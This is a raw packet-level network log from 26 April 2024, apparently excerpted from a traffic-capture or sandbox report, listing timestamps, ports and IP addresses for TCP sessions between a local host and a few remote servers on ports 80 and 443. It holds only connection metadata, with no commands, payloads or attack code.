Apr 26, 2024 17:11:12.837768078 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.837801933 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.837862968 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.837930918 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.838145018 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.838360071 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.838397980 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.838437080 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.838474035 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.838485003 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.838510990 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.838517904 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.838546991 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.838583946 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.838594913 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.838619947 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.838658094 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.838692904 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.838710070 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.838753939 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.839493990 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.839534044 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.839570999 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.839606047 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.839624882 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.839656115 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.840219021 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.840257883 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.840313911 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.840349913 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.840351105 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.840385914 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.840401888 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.840440989 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.840477943 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.840497017 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.840512991 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.840550900 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.840586901 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.840590954 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.840622902 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.840660095 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.840675116 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.840696096 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.840714931 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.840733051 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.840768099 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.840804100 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.840820074 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.840842009 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.840854883 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.840878010 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.840913057 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.840948105 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.840951920 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.840987921 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.841039896 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.841044903 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.841084957 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.841094971 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.841123104 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.841157913 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.841195107 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.841512918 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.841548920 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.841578960 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.841584921 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.841620922 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.841658115 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.841675997 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.841694117 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.841712952 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.841731071 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.841767073 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.841784000 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.841803074 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.841839075 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.841869116 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.841878891 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.841914892 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.841949940 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.841964960 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.841986895 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.842025042 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.842025995 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.842061043 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.842076063 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.842099905 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.842138052 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.842174053 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.842185974 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.842210054 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.842228889 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.842248917 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.842315912 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.842799902 CEST	49703	443	192.168.2.5	23.1.237.91
Apr 26, 2024 17:11:12.843107939 CEST	49703	443	192.168.2.5	23.1.237.91
Apr 26, 2024 17:11:12.843625069 CEST	49718	443	192.168.2.5	23.1.237.91
Apr 26, 2024 17:11:12.843678951 CEST	443	49718	23.1.237.91	192.168.2.5
Apr 26, 2024 17:11:12.843760014 CEST	49718	443	192.168.2.5	23.1.237.91
Apr 26, 2024 17:11:12.939941883 CEST	80	49714	185.172.128.76	192.168.2.5
Apr 26, 2024 17:11:12.939985991 CEST	80	49714	185.172.128.76	192.168.2.5
Apr 26, 2024 17:11:12.940018892 CEST	80	49714	185.172.128.76	192.168.2.5
Apr 26, 2024 17:11:12.940066099 CEST	80	49714	185.172.128.76	192.168.2.5
Apr 26, 2024 17:11:12.940098047 CEST	80	49714	185.172.128.76	192.168.2.5
Apr 26, 2024 17:11:12.944741964 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.006889105 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.006932974 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.006968021 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.013570070 CEST	49718	443	192.168.2.5	23.1.237.91
Apr 26, 2024 17:11:13.013643980 CEST	443	49718	23.1.237.91	192.168.2.5
Apr 26, 2024 17:11:13.052026033 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.052067995 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.052119017 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.052158117 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.052195072 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.052213907 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.052215099 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.052231073 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.052268028 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.052290916 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.052310944 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.052321911 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.053071022 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.053108931 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.053132057 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.053736925 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.053790092 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.053826094 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.053837061 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.053862095 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.053875923 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.055041075 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.055078983 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.055114985 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.055129051 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.055152893 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.055169106 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.055188894 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.055224895 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.055260897 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.055270910 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.055296898 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.055310011 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.055334091 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.055368900 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.055403948 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.055417061 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.055438995 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.055460930 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.055474997 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.055511951 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.055546045 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.055558920 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.055583000 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.055618048 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.055624008 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.055654049 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.055665970 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.055691004 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.055747986 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.055783987 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.055788040 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.055829048 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.055836916 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.055871964 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.055907965 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.055944920 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.055958033 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.055979967 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.056015968 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.056035995 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.056051970 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.056058884 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.056087017 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.056148052 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.056183100 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.056197882 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.056219101 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.056227922 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.056255102 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.056289911 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.056325912 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.056338072 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.056361914 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.056375027 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.056396961 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.056432962 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.056453943 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.056469917 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.056504011 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.056540012 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.056552887 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.056577921 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.056591034 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.056612968 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.056658983 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.056694031 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.056710958 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.056730032 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.056765079 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.056778908 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.056801081 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.056813955 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.056835890 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.056871891 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.056924105 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.057619095 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.057657003 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.057670116 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.057725906 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.057795048 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.057830095 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.057845116 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.057867050 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.057885885 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.057903051 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.057939053 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.057976007 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.057986975 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.058012962 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.058027029 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.058048010 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.058084011 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.058120966 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.058159113 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.058165073 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.058165073 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.058193922 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.058228970 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.058243990 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.058264971 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.058300972 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.058336973 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.058348894 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.058387995 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.069504023 CEST	443	49703	23.1.237.91	192.168.2.5
Apr 26, 2024 17:11:13.069665909 CEST	443	49703	23.1.237.91	192.168.2.5
Apr 26, 2024 17:11:13.079334021 CEST	80	49714	185.172.128.76	192.168.2.5
Apr 26, 2024 17:11:13.079401016 CEST	49714	80	192.168.2.5	185.172.128.76
Apr 26, 2024 17:11:13.083389997 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.083492994 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.083530903 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.083568096 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.083611012 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.083663940 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.083699942 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.083736897 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.083772898 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.083810091 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.083822966 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.083863020 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.083893061 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.083930969 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.083978891 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.084232092 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.084270954 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.084342003 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.084386110 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.084429026 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.084502935 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.084568024 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.084574938 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.084611893 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.084641933 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.084657907 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.084693909 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.084702969 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.084764004 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.084831953 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.084862947 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.090163946 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.090303898 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.090504885 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.090614080 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.090751886 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.090790987 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.092426062 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.092489004 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.092510939 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.092525959 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.092596054 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.092633009 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.092643023 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.092747927 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.092766047 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.092947006 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.093000889 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.093080997 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.093118906 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.093200922 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.093252897 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.093437910 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.093522072 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.093571901 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.095304012 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.095341921 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.095350027 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.095396042 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.095464945 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.095513105 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.097568989 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.097628117 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.097640991 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.097697973 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.097744942 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.097788095 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.097884893 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.097932100 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.097986937 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.098059893 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.098135948 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.098155975 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.098192930 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.098238945 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.098438978 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.098475933 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.098548889 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.098599911 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.098767996 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.098839998 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.098893881 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.098994017 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.099031925 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.099045992 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.099123955 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.099159956 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.099174023 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:13.099195957 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.099286079 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.099323988 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.099360943 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:13.099389076 CEST	49713	80	192.168.2.5	176.97.76.106
